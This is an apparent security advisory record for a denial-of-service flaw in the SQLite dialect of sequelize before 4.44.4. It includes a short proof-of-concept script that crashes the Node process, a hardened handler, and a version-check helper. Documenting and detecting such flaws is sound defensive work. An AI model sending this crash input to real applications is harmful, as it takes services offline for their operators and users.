GHSA-fw4p-36j9-rrj3

Source
https://github.com/advisories/GHSA-fw4p-36j9-rrj3
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-fw4p-36j9-rrj3/GHSA-fw4p-36j9-rrj3.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-fw4p-36j9-rrj3
Published
2020-09-03T20:25:33Z
Modified
2020-08-31T18:48:48Z
Summary
Denial of Service in sequelize
Details

Versions of sequelize prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect does not catch the TypeError raised when the results variable is undefined and .map is called on it. This may allow attackers to submit malicious input that forces the exception and crashes the Node process.

The following proof-of-concept crashes the Node process:

const Sequelize = require('sequelize');

// Use the SQLite dialect, the only dialect affected by this advisory.
const sequelize = new Sequelize({
    dialect: 'sqlite',
    storage: 'database.sqlite'
});

// The model is named TypeError in the original advisory; the name shadows
// the global TypeError but has no bearing on the crash.
const TypeError = sequelize.define('TypeError', {
    name: Sequelize.STRING,
});

// Inserting this value takes the code path where `results` is undefined;
// the following .map call throws an uncaught TypeError and the Node process exits.
TypeError.sync({force: true}).then(() => {
    return TypeError.create({name: "SELECT tbl_name FROM sqlite_master"});
});

Recommendation

Upgrade to version 4.44.4 or later.
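The following is an added illustration, not code from the advisory or from sequelize itself: it mimics the failure mode described above (calling .map on an undefined result set) beside a hardened handler, and provides a helper that tells whether a given sequelize version falls inside the affected range (below 4.44.4). The result-handler functions are hypothetical stand-ins for the dialect's own code.

```javascript
// Added illustration (not sequelize's code). Models the advisory's bug:
// a result handler that assumes `results` is always an array.

// Vulnerable pattern: the driver returns undefined for statements that
// produce no rows, and .map on undefined throws a TypeError. Left
// uncaught, that exception terminates the Node process.
function formatResultsVulnerable(results) {
  return results.map(row => row.name);
}

// Hardened form: treat a missing result set as an empty one.
function formatResultsSafe(results) {
  if (!Array.isArray(results)) return [];
  return results.map(row => row.name);
}

// Returns the name of the error the vulnerable handler throws on
// undefined input, or null if it does not throw.
function crashOnUndefined() {
  try {
    formatResultsVulnerable(undefined);
    return null;
  } catch (e) {
    return e.constructor.name;
  }
}

// Version check against the fixed version named in the advisory.
const FIXED = [4, 44, 4];

function parseSemver(version) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(version).trim());
  if (!m) throw new Error(`not a semver string: ${version}`);
  return m.slice(1, 4).map(Number);
}

// True when `version` < 4.44.4, i.e. inside the affected range.
function isAffected(version) {
  const parts = parseSemver(version);
  for (let i = 0; i < 3; i++) {
    if (parts[i] < FIXED[i]) return true;
    if (parts[i] > FIXED[i]) return false;
  }
  return false; // exactly 4.44.4 is fixed
}

// Stand-alone run: report on a constructed sample of versions.
for (const v of ['3.30.0', '4.44.3', '4.44.4', '5.0.0']) {
  console.log(v, isAffected(v) ? 'affected' : 'not affected');
}
console.log('vulnerable handler throws:', crashOnUndefined());
```

To check a deployed application, pass `require('sequelize/package.json').version` to `isAffected`.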

Database specific
{
    "github_reviewed": true,
    "severity": "MODERATE",
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-248"
    ],
    "github_reviewed_at": "2020-08-31T18:48:48Z"
}
References

Affected packages

npm / sequelize

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
4.44.4

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-fw4p-36j9-rrj3/GHSA-fw4p-36j9-rrj3.json"